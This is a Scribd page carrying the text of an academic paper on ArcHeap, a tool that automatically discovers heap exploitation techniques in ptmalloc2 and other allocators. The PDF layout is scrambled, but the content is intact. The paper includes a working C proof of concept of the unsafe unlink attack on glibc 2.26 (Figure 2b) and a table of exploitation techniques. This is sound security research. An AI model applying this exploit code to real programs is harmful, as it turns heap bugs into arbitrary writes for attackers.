0% found this document useful (0 votes)
9 views18 pages

Sec20fall Yun Prepub

The document presents A RC H EAP, an automated tool designed to systematically discover new heap exploitation primitives across various heap allocators. It explores the internal designs of heap allocators and generates proof-of-concept exploits, successfully identifying five new techniques in ptmalloc2 and others in different allocators. The tool aims to enhance the understanding of heap vulnerabilities and improve security evaluations by overcoming the limitations of traditional, manual exploitation discovery methods.

Uploaded by

Project Group
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
9 views18 pages

Sec20fall Yun Prepub

The document presents A RC H EAP, an automated tool designed to systematically discover new heap exploitation primitives across various heap allocators. It explores the internal designs of heap allocators and generates proof-of-concept exploits, successfully identifying five new techniques in ptmalloc2 and others in different allocators. The tool aims to enhance the understanding of heap vulnerabilities and improve security evaluations by overcoming the limitations of traditional, manual exploitation discovery methods.

Uploaded by

Project Group
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 18

Automatic Techniques to Systematically Discover

New Heap Exploitation Primitives

Insu Yun† Dhaval Kapil‡ Taesoo Kim†


† Georgia Institute of Technology ‡ Facebook

Abstract Target programs Before ASLR


02-04 05-07 Total 08-10 11-13
After ASLR
14-16 17-19 Total
Exploitation techniques to abuse metadata of heap allocators Scriptable 0 12 12 13 29 11 4 57
have been widely studied because of their generality (i.e., Non-scriptable
(via heap exploit techs)
9
12
7
12
16
24
5
3
1
4
3
1
2
2
11
10
application independence) and powerfulness (i.e., bypassing Scriptable: Software accepting a script language
modern mitigation). However, such techniques are commonly (e.g., web browsers or PDF readers).
considered arts, and thus the ways to discover them remain Table 1: The number of exploitations that lead to code execu-
ad-hoc, manual, and allocator-specific. tion from heap vulnerabilities in exploit-db [50]. A heap exploit
In this paper, we present an automatic tool, A RC H EAP, technique is one of the popular methods used to compromise non-
to systematically discover the unexplored heap exploita- scriptable programs—bugs in scriptable programs typically allow
tion primitives, regardless of their underlying implementa- much easier, simpler way for exploitation, requiring no use of the
tions. The key idea of A RC H EAP is to let the computer au- heap exploitation technique.
tonomously explore the spaces, similar in concept to fuzzing,
by specifying a set of common designs of modern heap allo- application internals. Second, heap vulnerabilities are typi-
cators and root causes of vulnerabilities as models, and by cally so powerful that attackers can bypass modern mitigation
providing heap operations and attack capabilities as actions. schemes by abusing them. For example, a seemingly be-
During the exploration, A RC H EAP checks whether the com- nign bug that overwrites one NULL byte to the metadata of
binations of these actions can be potentially used to construct ptmalloc2 leads to a privilege escalation on Chrome OS [2].
exploitation primitives, such as arbitrary write or overlapped Heap exploitation techniques have steadily been used in
chunks. As a proof, A RC H EAP generates working PoC that real-world exploits. To show that, we collected successful
demonstrates the discovered exploitation technique. exploits for heap vulnerabilities leading to arbitrary code exe-
We evaluated A RC H EAP with ptmalloc2 and 10 other allo- cution from the well-known exploit database, exploit-db [50].
cators, and discovered five previously unknown exploitation As shown in Table 1, heap exploitation techniques were one
techniques in ptmalloc2 as well as several techniques against of the favorable ways to compromise software when ASLR
seven out of 10 allocators including the security-focused allo- was not implemented (24 / 52 exploits). Even after ASLR
cator, DieHarder. To show the effectiveness of A RC H EAP’s is deployed, heap bugs in non-scriptable programs are fre-
approach in other domains, we also studied how security fea- quently exploited via heap exploitation techniques (10 / 21
tures and exploit primitives evolve across different versions exploits). Not to mention, popular software such as the Exim
of ptmalloc2. mail server [47], WhatsApp [6] and VMware ESXi [77] are
all hijacked via the heap exploitation technique in 2019. Note
1 Introduction that scriptable programs provide much simpler, flexible ex-
Heap-related vulnerabilities have been the most common, ploitation techniques, so using heap exploitation techniques is
yet critical source of security problems in systems soft- not yet preferred by an attacker: e.g., corrupting an array-like
ware [42, 64, 65, 71]. According to Microsoft, heap vul- structure to achieve arbitrary reads and writes.
nerabilities accounted for 53% of security problems in their Communities have been studying possible attack tech-
products in 2017 [48]. One way to exploit these vulnerabili- niques against heap vulnerabilities (see, Table 2), but finding
ties is to use heap exploitation techniques [61], which abuse such techniques is often considered an art, and thus the ap-
underlying allocators. There are two properties that make proaches used to discover them remain ad-hoc, manual and
these techniques preferable for attacks. First, heap exploita- allocator-specific at best. Unfortunately, such a trend makes it
tion techniques tend to be application-independent, making hard for communities to understand the security implications
it possible to write exploit without a deep understanding of of various heap allocators (or even across different versions).
2001 • (1) Once upon a free()... [1] Allocators B I C Description (applications)
2003 • (1) Advanced Doug lea’s malloc exploits [38] ptmalloc2 ✓ ✓ ✓ A default allocator in Linux.
2004 • (2) Exploiting the wilderness [55] dlmalloc ✓ ✓ ✓ An allocator that ptmalloc2 is based on.
2007 • (2) The use of set_head to defeat the wilderness [25] jemalloc ✓ ✓ A default allocator in FreeBSD.
tcmalloc ✓ ✓ ✓ A high-performance allocator from Google.
2007 • (3) Understanding the heap by breaking it [20] PartitionAlloc ✓ ✓ A default allocator in Chromium.
2009 • (1) Yet another free() exploitation technique [36] libumem ✓ ✓ A default allocator in Solaris.
2009 • (6) Malloc Des-Maleficarum [7] B: Binning, I: In-place metadata, C: Cardinal data
2010 • (2) The house of lore: Reloaded [8]
Table 3: Common designs used in various memory allocators. This
2014 • (1) The poisoned NUL byte, 2014 edition [18]
2015 • (2) Glibc adventures: The forgotten chunk [28] table shows that even though their detailed implementations could
2016 • (3) Ptmalloc fanzine [37] be different, heap allocators share common designs that can be
2016 • (3) New exploit methods against Ptmalloc of Glibc [72] exploited for automatic testing.
2016 • (1) House of Einherjar [66]
2018 • (5) A RC H EAP writes or overlapped chunks—we devised shadow-memory-
Table 2: Timeline for new heap exploitation techniques discov- based detection for efficient evaluation (see, §5.3). Whenever
ered and their count in parentheses (e.g., A RC H EAP found five new A RC H EAP finds a new exploit primitive, it generates a work-
techniques in 2018). ing PoC code using delta-debugging [76] to reduce redundant
test cases to a minimal, equivalent class.
For example, when tcache was recently introduced in ptmal- We evaluated A RC H EAP with ptmalloc2 and 10 other al-
loc2 to improve the performance with a per-thread cache, its locators. As a result, we discovered five new exploit tech-
security was improperly evaluated (i.e., insufficient integrity niques against Linux’s default heap allocator, ptmalloc2.
checks for allocation or free [17, 37]), enabling an easier A RC H EAP’s approach can be extended beyond ptmalloc2;
way for exploitation. Moreover, existing studies for heap A RC H EAP found several exploit primitives against other pop-
exploitation techniques are highly biased; only ptmalloc2 is ular heap allocators, such as tcmalloc and jemalloc. Moreover,
exhaustively considered (e.g., missing DieHarder [49]). by disclosing unexpected exploit primitives, A RC H EAP iden-
In this paper, we present an automatic tool, A RC H EAP, tified three implementation bugs in DieHarder, Mesh [56],
to systematically discover the unexplored heap exploita- and mimalloc, respectively.
tion primitives, regardless of their underlying implementa- The closest related work to A RC H EAP is HeapHopper [17],
tions. The key idea of A RC H EAP is to let the computer au- which verifies existing heap exploit techniques using symbolic
tonomously explore the spaces, similar in concept to fuzzing, execution. Compared with HeapHopper, A RC H EAP outper-
which is proven to be practical and effective in discovering forms it in finding new techniques; none of the new techniques
software bugs [29, 75]. from A RC H EAP are found by HeapHopper. Moreover, unlike
However, it is non-trivial to apply classical fuzzing tech- HeapHopper, A RC H EAP is independent on exploit-specific
niques to discover new heap exploitation primitives for three information, which is unavailable in finding new techniques;
reasons. First, to successfully trigger a heap vulnerability, HeapHopper found only three out of eight known techniques
it must generate a particular sequence of steps with exact in ptmalloc2 without the prior knowledge, while A RC H EAP
data, quickly rendering the problem intractable using fuzzing found all eight. This shows that HeapHopper is ineffective for
approaches. Accordingly, researchers attempt to tackle this this new task (i.e., finding new exploit techniques), justifying
problem using symbolic execution instead, but stumbled over the need for this new tool.
the well-known state explosion problem, thereby limiting its To show the effectiveness of the A RC H EAP’s approach in
scope to validating known exploitation techniques [17]. Sec- other domains, we also studied how exploit primitives evolve
ond, we need to devise a fast way to estimate the possibility across different versions of ptmalloc2, demonstrating the need
of heap exploitation, as fuzzing requires clear signals, such as for an automated method to evaluate the security of heap allo-
segmentation faults, to recognize interesting test cases. Third, cators. To foster further research, we open-source A RC H EAP
the test cases generated by fuzzers are typically redundant at https://github.com/sslab-gatech/ArcHeap.
and obscure, so users are required to spend non-negligible In summary, we make the following contributions:
time and effort analyzing the final results. • We show that heap allocators share common designs, and
The key intuition to overcome these challenges (i.e., reduc- we devise an efficient method to evaluate exploitation
ing search space) is to abstract the internals of heap allocators techniques using shadow memory.
and the root causes of heap vulnerabilities (see §3.1). In • We design, implement, and evaluate our prototype,
particular, we observed that modern heap allocators share A RC H EAP, a tool that automatically discovers heap ex-
three common design components, namely, binning, in-place ploitation techniques. against various allocators.
metadata, and cardinal data. On top of these models, we • A RC H EAP found five new techniques in ptmalloc2 and
directed A RC H EAP to mutate and synthesize heap operations several techniques in various allocators, including tc-
and attack capabilities. During the exploration, A RC H EAP malloc, jemalloc, and DieHarder, and it outperforms
checks whether the generated test case can be potentially a state-of-the-art tool, HeapHopper, in finding new ex-
used to construct exploitation primitives, such as arbitrary ploitation techniques.
1 struct malloc_chunk {
2 Analysis of Heap Allocators 2 // size of "previous" chunk
3 // (only valid when the previous chunk is freed, P=0)
2.1 Modern Heap Allocators 4 size_t prev_size;
5 // size in bytes (aligned by double words): lower bits
Dynamic memory allocation [41] plays an essential role in 6 // indicate various states of the current/previous chunk
7 // A: alloced in a non-main arena
managing a program’s heap space. The C standard library 8 // M: mmapped
defines a set of APIs to manage dynamic memory allocations 9 // P: "previous" in use (i.e., P=0 means freed)
10 size_t size;
such as malloc() and free() [24]. For example, malloc() 11 // double links for free chunks in small/large bins
allocates the given number of bytes and returns a pointer 12 // (only valid when this chunk is freed)
13 struct malloc_chunk* fd;
to the allocated memory, and free() reclaims the memory 14 struct malloc_chunk* bk;
specified by the given pointer. 15 // double links for next larger/smaller size in largebins
16 // (only valid when this chunk is freed)
A variety of heap allocators [19, 26, 41, 43, 45, 49, 56, 17 struct malloc_chunk* fd_nextsize;
59, 64, 65] have been developed to meet the specific needs 18 struct malloc_chunk* bk_nextsize;
19 };
of target programs. Heap allocators have two types of com-
mon goals: good performance and small memory footprint— struct malloc_chunk struct malloc_chunk
minimizing the memory usage as well as reducing fragmenta-

next free chuns


malloc():

linked to
tion, which is the unused memory (i.e., hole) among in-use returned ptr size A M P free(ptr) size A M P
memory blocks. Unfortunately, these two desirable properties fd

payload size

size
payload bk

(usable)
are fundamentally conflicting; an allocator should minimize
...
additional operations to achieve good performance, whereas
it requires additional operations to minimize fragmentation. prev_size (= size)
size A M P=1 size A M P=0
Therefore, the goal of an allocator is typically to find a good
balance between these two goals for its workloads.
(a) allocated chunk (b) free chunk
Common designs. In analyzing various heap allocators, (e.g., small bin)

we found their common design principles shown in Table 3: Figure 1: Metadata for a chunk in ptmalloc2 and memory layout
binning, in-place metadata, and cardinal data. Many allo- for the in-use and freed chunks [23].
cators use size-based classification, known as binning. In
particular, they partition a whole size range into multiple binning to explore multiple size groups of an allocator. For
groups to manage memory blocks deliberately according to example, if we just uniformly pick a size in the 264 space, the
their size groups; small-size blocks focus on performance, probability of choosing the smallest size group in ptmalloc2
and large-size blocks focus on memory usage of the alloca- (< 27 ) becomes nearly zero (2−57 ). Thus, we need to use a
tors. Moreover, by dividing size groups, when they try to find better sampling method considering binning. Moreover, the
the best-fit block, the smallest but sufficient block for given other two design principles — in-place and cardinal metadata
request, they scan only blocks in the proper size group instead — limit the locations and domains of metadata, reducing the
of scanning all memory blocks. search space. Under these design principles, we only need to
Moreover, many dynamic memory allocators place meta- focus on metadata in the boundary of a chunk with specific
data near the payload, called in-place metadata, even though forms (i.e., pointers or sizes).
some allocators avoid this because of security problems from
corrupted metadata in the presence of memory corruption
2.2 ptmalloc2: glibc’s Heap Allocator
bugs (see Table 3). To minimize memory fragmentation, a In this section, we discuss ptmalloc2 [22, 23, 27], the heap
memory allocator should maintain information about allo- allocator used in glibc, whose exploitation techniques have
cated or freed memory in metadata. Even though the allocator been heavily studied because of its prevalence and its com-
can place metadata and payload in distinct locations, many plexity of metadata [1, 3, 7, 18, 20, 25, 36, 38, 55]. Similar
allocators store the metadata near the payload (i.e., a head or to other work [17, 58], we will use ptmalloc2 as our default
a tail of a chunk) to increase locality. In particular, by con- allocator for further discussions.
necting metadata and payload, an allocator can get benefits Metadata. A chunk in ptmalloc2 is a memory region con-
from the cache, resulting in performance improvement. taining metadata and payload. Memory allocation API such
Further, memory allocators contain only cardinal data that as malloc() returns the address of the payload in the chunk.
are not encoded and essential for fast lookup and memory Figure 1 shows the metadata of a chunk and its memory lay-
usage. In particular, metadata are mostly pointers or size- out for an in-use and a freed chunk. prev_size represents the
related values that are used for their data structures. For size of a previous chunk if it is freed. Although the prev_size
example, ptmalloc2 stores a raw pointer for a linked list that of a chunk overlaps with the payload of the previous chunk,
is used to maintain freed memory blocks. this is legitimate since prev_size is considered only after the
This observation has been leveraged to devise the universal previous chunk is freed, i.e., the payload is no longer used.
method to test various allocators regardless of their imple- size represents the size of a current chunk. The real size
mentations (see §5.2). First, our approach should consider of the chunk is 8-bit aligned, and the 3 LSBs of the size are
1 #define unlink(AV, P, BK, FD) \
used for storing the state of the chunk. The last bit of size, 2 /* (1) checking if size == the next chunk’s prev_size */ \
called PREV_IN_USE (P), shows whether the previous chunk is 3 ⋆ if (chunksize(P) != prev_size(next_chunk(P))) \
4 ⋆ malloc_printerr("corrupted size vs. prev_size"); \
in use. For example, in Figure 1, after the chunk is freed, the 5 FD = P->fd; \
PREV_IN_USE in the next chunk is changed from 1 to 0. Other 6 BK = P->bk; \
7 /* (2) checking if prev/next chunks correctly point */ \
metadata, fd, bk, fd_nextsize, and bk_nextsize, are used to 8 ⋆ if (FD->bk != P || BK->fd != P) \
maintain linked lists that hold freed chunks. 9 ⋆ malloc_printerr("corrupted double-linked list"); \
10 ⋆ else { \
Binning. ptmalloc2 has several types of bins: fast bin, small 11 FD->bk = BK; \
12 BK->fd = FD; \
bin, large bin, unsorted bin, and tcache [15]. Each bin has 13 ... \
its own characteristics to achieve its goal; a fast bin uses a 14 ⋆ }
single-linked list, giving up merging for performance, but a
(a) Security checks introduced since glibc 2.3.4 and 2.26. Two
small bin merges its freed chunks to reduce fragmentation.
security checks first validate two invariants (see, comments above)
Moreover, a large bin stores chunks that have different sizes to before unlinking the victim chunk (i.e., P).
handle arbitrarily large chunks. To optimize scanning for the 1 // [PRE-CONDITION]
best-fit chunk, a large bin maintains another sorted, double- 2 // sz : any non-fast-bin size
3 // dst: where to write (void*)
linked list. The unsorted bin is a special bin that serves as a 4 // val: target value
fast staging place for free chunks. If a chunk is freed, it first 5 // [BUG] buffer overflow (p1)
6 // [POST-CONDITION] *dst = val
moves to the unsorted bin and is used to serve the subsequent 7 void *p1 = malloc(sz);
allocation. If the chunk is not suitable for the request, it 8 void *p2 = malloc(sz);
9 struct malloc_chunk *fake = p1;
will move to a regular bin (i.e., a small bin or a large bin). 10 // bypassing (1): P->size == next_chunk(P)->prev_size.
Using the unsorted bin, ptmalloc2 can increase locality for 11 // If fake_chunk->size = 0, next_chunk(fake)->prev_size
12 // will point to fake->prev_size. By setting both values
performance by deferring the decision for the regular bins. 13 // zero, we can bypass the check. These assignements
The tcache, per-thread cache, is enabled by default from 14 // can be ommitted since heap memory is zeroed out at
15 // first time of execution.
glibc 2.26. It works similarly to a fast bin but requires no 16 fake->prev_size = fake->size = 0;
locking for threads, and therefore it can achieve significant 17 // bypassing (2): P->fd->bk == P && P->bk->fd == P
18 fake->fd = (void*)&fake - offsetof(struct malloc_chunk, bk);
performance improvements for multithread programs [15]. 19 fake->bk = (void*)&fake - offsetof(struct malloc_chunk, fd);
20 struct malloc_chunk *c2 = raw_to_chunk(p2);
2.3 Complex Modern Heap Exploits 21 // it shrinks the previous chunk’s size,
22 // tricking ‘fake’ as the previous chunk
Heap exploit techniques have recently been much subtle 23 c2->prev_size = chunk_size(sz) \
24 - offsetof(struct malloc_chunk, fd);
and sophisticated to bypass the new security checks intro- 25 // [BUG] overflowing p1 to modify c2’s size:
duced in the allocators. If an attacker found a vulnerability 26 // tricking the previous chunk freed, P=0
27 c2->size &= ~1;
that corrupts heap metadata (e.g., overflow) or improperly 28 // triggering unlink(fake) via backward consolidation
uses heap APIs (e.g., double free), the next step is to de- 29 free(p2);
30 assert(p1 == (void*)&p1 - offsetof(struct malloc_chunk, bk));
velop the bug to a more useful exploit primitive such as ar- 31 // writing with p1: overwriting itself to dst
bitrary write. To do so, attackers typically have to modify 32 *(void**)(p1 + offsetof(struct malloc_chunk, bk)) = dst;
33 // writing with p1: overwriting *dst with val
the heap metadata, craft a fake chunk, or call other heap 34 *(void**)p1 = (void*)val;
APIs according to the implementation of the target heap al- 35 assert(*dst == val);
locator. This development was trivial in the good old days (b) The unsafe unlink exploitation in glibc 2.26
for attackers; they can use the universal technique for most
Figure 2: The unlink macros and an exploit abusing the mechanism
allocators (e.g., unsafe unlink). However, it became com-
in glibc 2.26. Compared to old glibc, two security checks have
plicated after many security checks were introduced to re-
been added in glibc 2.26. The first one hardens the off-by-one
spond to such attacks. Therefore, researchers have studied overflow, and the second one hardens unlinking abuse. Even though
and shared heap exploitation techniques that are reusable the security checks harden the attack, it is still avoidable.
methods to develop vulnerabilities to useful attack primi-
tives [1, 3, 7, 18, 18, 20, 25, 36, 38, 55, 66, 72]. Table 4
summarizes modern heap exploitation techniques from previ- dows allocator [1].
ous work [17] and new ones that our tool, A RC H EAP, found. To mitigate this attack, allocators have added the new se-
Example: Unsafe unlink. One of the most famous heap curity check shown in Figure 2a, which turns out to be insuf-
exploitation techniques is the unsafe unlink attack that abuses ficient to prevent more advanced attacks. The check verifies
the unlink mechanism of double-linked lists in heap allocators, an invariant of a double-linked list that a backward pointer of
as illustrated in Figure 2a. By modifying a forward pointer a forward pointer of a chunk should point to the chunk (i.e.,
(P->fd) into a properly encoded location and a backward P->fd->bk == P) and vice versa. Therefore, attackers cannot
pointer (P->bk) into a desired value, attackers can achieve make the pointer directly refer to arbitrary locations as before
arbitrary writes (see, P->fd->bk = P->bk). Due to the preva- since the pointer will not hold the invariant. Even though the
lence of double-linked lists, this technique was used for many check prevents the aforementioned attack, attackers can avoid
allocators, including dlmalloc, ptmalloc2, and even the Win- this check by making a fake chunk to meet the condition, as
Name Abbr. Description New
Fast bin dup FD Corrupting a fast bin freelist (e.g., by double free or write-after-free) to return an arbitrary location
Unsafe unlink UU Abusing unlinking in a freelist to get arbitrary write
House of spirit HS Freeing a fake chunk of fast bin to return arbitrary location
Poison null byte PN Corrupting heap chunk size to consolidate chunks even in the presence of allocated heap
House of lore HL Abusing the small bin freelist to return an arbitrary location
Overlapping chunks OC Corrupting a chunk size in the unsorted bin to overlap with an allocated heap
House of force HF Corrupting the top chunk to return an arbitrary location
Unsorted bin attack UB Corrupting a freed chunk in unsorted bin to write a uncontrollable value to arbitrary location
House of einherjar HE Corrupting PREV_IN_USE to consolidate chunks to return an arbitrary location that requires a heap address
Unsorted bin into stack UBS Abusing the unsorted freelist to return an arbitrary location ✓
House of unsorted einherjar HUE A variant of house of einherjar that does not require a heap address ✓
Unaligned double free UDF Corrupting a small bin freelist to return already allocated heap ✓
Overlapping small chunks OCS Corrupting a chunk size in a small bin to overlap chunks ✓
Fast bin into other bin FDO Corrupting a fast bin freelist and use malloc_consolidate() to return an arbitrary non-fast-bin chunk ✓

Table 4: Modern heap exploitation techniques from recent work [17] including new ones found by A RC H EAP in ptmalloc2 with abbreviations
and brief descriptions. For brevity, we omitted tcache-related techniques.

in Figure 2b. Compared to the previous one, the check makes but overwriting the NULL byte (e.g., when using string
the exploitation more complicated, but still feasible. related libraries such as sprintf).
It is worth noting that, unlike a typical exploit scenario that
3 Heap Abstract Model assumes arbitrary reads and writes, we exclude such primi-
In this section, we discuss our heap abstract model, which tives for two reasons: They are too specific to applications
enables us to describe a heap exploit technique independent and execution contexts, hardly meaningful for generalization,
from an underlying allocator. Here, we focus on an adver- and they are so powerful for attackers to launch easier attacks,
sarial model, omitting obvious heap APIs (i.e., malloc and demotivating use of heap exploitation techniques. Therefore,
free) for brevity. Note that this abstraction is consistent with such powerful primitives are considered one of the ultimate
related work [17, 58]. goals of heap exploitation.
3.1 Abstracting Heap Exploitation 2) Impact of exploitation. The goal of each heap exploita-
tion technique is to develop common types of heap-related
Our model abstracts a heap technique in two aspects: 1) bugs into more powerful exploit primitives for full-fledged
types of bugs (i.e., allowing an attacker to divert the program attacks. For the systematization of a heap exploit, we catego-
into unexpected states), and 2) impact of exploitation (i.e., rize its final impact (i.e., an achieved exploit primitive) into
describing what an attacker can achieve as a result). This four classes:
section elaborates on each of these aspects. • Arbitrary-chunk (AC): Hijacking the next malloc to
1) Types of bugs. Four common types of heap-related bugs return an arbitrary pointer of choice.
instantiate exploitation: • Overlapping-chunk (OC): Hijacking the next malloc
• Overflow (OF): Writing beyond an object boundary. to return a chunk inside a controllable (e.g., over-
• Write-after-free (WF): Reusing a freed object. writable) chunk by an attacker.
• Arbitrary free (AF): Freeing an arbitrary pointer. • Arbitrary-write (AW): Developing the heap vulnerabil-
• Double free (DF): Freeing a reclaimed object. ity into an arbitrary write (a write-where-what primitive).
Each of theses mistakes of a developer allows attackers • Restricted-write (RW): Similar to arbitrary-write, but
to divert the program into unexpected states in a certain with various restrictions (e.g., non-controllable “what”,
way: overflow allows modification of all the metadata (e.g., such as a pointer to a global heap structure).
struct malloc_chunk in Figure 1) of any consequent chunks; Attackers want to hijack control by using these exploit primi-
write-after-free allows modification of the free metadata tives combined with application-specific execution contexts.
(e.g., fd/bk in Figure 1), which is similar in spirit to use-after- For example, in the unsafe unlink (see, Figure 2), attackers
free; double free allows violation of the operational integrity can develop heap overflow to arbitrary writes and corrupt
of the internal heap metadata (e.g., multiple reclaimed point- code pointers to hijack control.
ers linked in the heap structure); and arbitrary free similarly
breaks the operational integrity of the heap management but 3.2 Threat Model
in a highly controlled manner—freeing an object with the To commonly describe heap exploitation techniques, we clar-
crafted metadata. Since overflow enables a variety of paths ify legitimate actions that an attacker can launch. First, an
for exploitation, we further characterize its types based on attacker can allocate an object with an arbitrary size, and
common mistakes and errors by developers. free objects in an arbitrary order. This essentially means
• Off-by-one (O1): Overwriting the last byte of the next that the attacker can invoke an arbitrary number of malloc
consequent chunk (e.g., when making a mistake in size calls with an arbitrary size parameter and invoke free (or not)
calculation, such as CVE-2016-5180 [31]). in whatever order the attacker wishes. Second, the attacker
• Off-by-one NULL (O1N): Similar to the previous type, can write arbitrary data on legitimate memory regions (i.e.,
the payload in Figure 1 or global memory). Although such Heap action generator PoC generator
legitimate behaviors largely depend on applications in theory, Generate random Minimize actions
heap actions using delta-debugging
assuming this powerful model lets us examine all potential Model (§5.2) (§5.4) PoC
specification exploit
opportunities for abuses. Third, the attacker can trigger only a
single type of bug. This limits the capabilities of the adversary Execute actions and Generate PoC exploit
to the realistic setting. However, we allow multiple uses of detect impacts (§5.3) (§5.4)

the same type to simulate a re-triggerable bug in practice. We


note that it is always more favorable to an attacker if a heap Figure 3: Overview of A RC H EAP. It first generates heap actions
exploit technique requires fewer capabilities than what are according to an optional model specification. While executing the
generated actions, it estimates the impact of exploitation. Whenever
described here, and in such cases, we make a side note for
a new exploit is found, it minimizes the actions and produces Proof-
better clarification. of-Concept (PoC) code.
4 Technical Challenges
new exploitation techniques with the community (§5.4).
Our goal is to automatically explore new types of heap ex-
ploitation techniques given an implementation of any heap 5 Autonomous Exploration for Finding Heap
allocator—its source code is not required like AFL [75]. Such Exploitation Techniques
a capability not only enables to support automatic exploit syn-
thesis but also makes several, unprecedented applications 5.1 Overview
possible: 1) systematically discovering unknown types of A RC H EAP follows a common paradigm in classical fuzzing—
heap exploitation schemes; 2) comprehensively evaluating test generation, crash detection, and test reduction—but is
the security of popular heap allocators; and 3) providing in- tailored to heap exploitation (see Figure 3). It first generates
sight into what and how to improve their security. However, a sequence of heap actions based on a user-provided model
achieving this autonomous capability is far from trivial, for specification. This specification is optional; if it is not given,
the following reasons. A RC H EAP will generate every possible action. Heap actions
Autonomous reasoning of the heap space. To find heap that A RC H EAP can formulate include heap allocation, free,
exploitation techniques, we should satisfy complicated con- buffer writes, heap writes, and bug invocation (§5.2). Dur-
straints to bypass security checks (see §2.3) in a large search ing execution, A RC H EAP evaluates whether the executed test
space consisting of enormous possible orders, arguments for case results in impacts of exploitation, similar in concept to de-
heap APIs, and data in the heap and global buffer. This tecting a crash in fuzzing (§5.3). Whenever A RC H EAP finds
space could be greatly reduced using exploit-specific knowl- a new exploit, it minimizes the heap actions and produces
edge [17]; however, this is not applicable for finding new PoC code (see Figure 5), which contains only an essential set
exploit techniques. To resolve this issue, we use a random of actions (§5.4). It is worth noting that this minimization is
search algorithm that is effective in exploring a large search to help post-analysis of a found technique but is irrelevant to
space [33]. We also abstract common designs of modern heap false positives; A RC H EAP yields no false positive during our
allocators to further reduce the search space (§5.2). evaluation thanks to its straightforward analysis at runtime.
Devising exploitation techniques. While enumerating
possible candidates for exploit techniques, a system needs
5.2 Generating Actions for Abstract Heap
to verify whether the candidates are valuable. One way A RC H EAP randomly generates five types of heap-related ac-
to assess the candidates is to synthesize end-to-end ex- tions: allocation, deallocation, buffer writes, heap writes, and
ploits automatically (e.g., spawning a shell), but this is ex- bug invocation. To reduce the search space, A RC H EAP for-
tremely difficult and inefficient, especially for heap vulnera- mulates each action on top of an abstract heap model using
bilities [4, 11, 16, 33, 58, 60]. To resolve this issue, we use the common design idioms of modern allocators. The follow-
the concept of impact of exploitation. In particular, we esti- ing explains how each action takes advantage of the designs
mate the impacts of exploitation (i.e., AC, OC, AW, and RW) in reducing the search space.
during exploration instead of synthesizing a full exploit. We Allocation. The first action that A RC H EAP can perform is
show that these impacts can be quickly detectable at runtime allocating memory through the standardized API, malloc().
by utilizing shadow memory (§5.3). After allocating memory, A RC H EAP stores the returned ob-
Normalization. Even though a random search is effective ject’s address to its internal data structure, called the con-
in exploring a large search space, an exploitation technique tainer. It also stores a chunk size of the object using another
found by this algorithm tends to be redundant and inessen- API, malloc_usable_size(), and its status (i.e., allocated)
tial, requiring non-trivial time to analyze the result. To fix for further use in other actions (Line 15 – 23 in Figure 4), e.g.,
this issue, we leverage the delta-debugging technique [76] deallocation or bug invocation.
to minimize the redundant actions and transform the found A RC H EAP allocates memory in random size but con-
result into an essential class. This is so effective that we could sidering multiple aspects to test an allocator. First of all,
reduce actions by 84.3%, drastically helping us to share the A RC H EAP carefully chooses a size of an object (I1 in Ta-
1 void check_shadow(bool arbitrary) {
Name Description Align Trans Model 2 // check shadow memory and report ARBITRARY_WRITE
I1 Random size (binning) 3 // if arbitrary is true, othewise RESTRICTED_WRITE
I2 Chunk size of a chunk ax + b 4 }
I3 Pre-defined constants 5 void check_overlap(void** ptr) {
I4 Offsets between pointers ✓ x+b HA, BA, CA 6 // check overlaps of ptr with other chunks, buffer, or container
7 }
P1 NULL 8 void* random_size() {
P2 The buffer address ✓ x+b BA 9 // generate random size using the integer strategies in Table 5
P3 A heap address ✓ x+b HA 10 // note that it only uses container and buffer, not their shadow
P4 The container address ✓ x+b CA 11 }
I: Integer strategy, P: Pointer strategy, HA: Heap address, 12 void* random_value() {
13 // similar to random_size(), but use all strategies in Table 5
BA: Buffer address, CA: Container address 14 }
Table 5: Strategies for generating random values by A RC H EAP. 15 void allocate() {
16 void** ptr = malloc(random_size());
A RC H EAP has two types of strategies: the integer type and the 17 check_shadow(false);
pointer type. It generates the values according to alignment, trans- 18 check_overlap(ptr);
formation, and the given model (see §5.1) of each type. 19 allocated[ptr_id] = true;
20 chunk_sizes[ptr_id] = malloc_usable_size(ptr);
21 container[ptr_id] = container_shadow[ptr_id] = ptr;
22 ptr_id++;
ble 5) to examine different logic in different bins. In partic- 23 }
ular, A RC H EAP first randomly selects a group of sizes and 24 void deallocate() {
25 int index = rand() % ptr_id;
then allocates an object whose size is in this group. This 26 if (!allocated[index]) return;
group is separated by approximate boundary values instead of 27 allocated[index] = false;
28 free(container[index]);
implementation-specific ones to make A RC H EAP compatible 29 check_shadow(false);
with any allocator. Currently, A RC H EAP uses four bound- 30 }
void heap_write() {
aries with exponential distance from 20 to 220 , e.g., the first 31
32 int index = rand() % ptr_id;
group is [20 , 25 ), the second one is [25 , 21 0), etc. It makes a 33 if (!allocated[index]) return;
34 void** ptr = container[index];
small size likely to be chosen. For instance, the chance of 35 size_t num = rand() % MAX_WRITE + 1;
making a fast-bin object in ptmalloc2 becomes more than 1/4 36 size_t start = 0, end = num; // a head of the chunk
(i.e., chance to select the first group), which was 2−57 in the 37
38
if (rand() % 2) { // a tail of the chunk
end = chunk_sizes[index] / (sizeof(void*));
uniform sampling. This division is arbitrary but sufficient for 39 start = end - num;
40 }
increasing the probability of exploring various bins. 41 for (size_t i = start; i < end; i++)
A RC H EAP also attempts to allocate multiple objects in the 42 ptr[i] = random_value();
43 check_shadow(true);
same bin (I2) since an object interacts with others in the same 44 }
bin. For example, in ptmalloc2, a non-fast-bin object merges 45 void buffer_write() {
46 int index = rand() % MAX_BUF;
with a non-fast-bin object, not with a fast bin object. To cover 47 size_t num = rand() % MAX_WRITE + 1;
this interaction, A RC H EAP allocates an object whose size is 48 for (int i = 0; i < num; i++)
49 buffer[i] = buffer_shadow[i] = random_value();
related to the other object’s size. 50 check_shadow(true);
To find techniques induced by common mistakes in an al- 51 }
locator, A RC H EAP also uses specialized sizes (I3, I4). In
Figure 4: Pseudocode for generating actions in A RC H EAP. To save
particular, A RC H EAP uses the differences between pointers space, we omitted several functions, sanity checks, and variable
to find integer overflow vulnerabilities in an allocator. For ex- declarations that can be inferred.
ample, a vulnerable allocator can return a buffer address when
claiming a very large chunk whose size is the same as the dif- random generation) infeasible. To overcome such limitations,
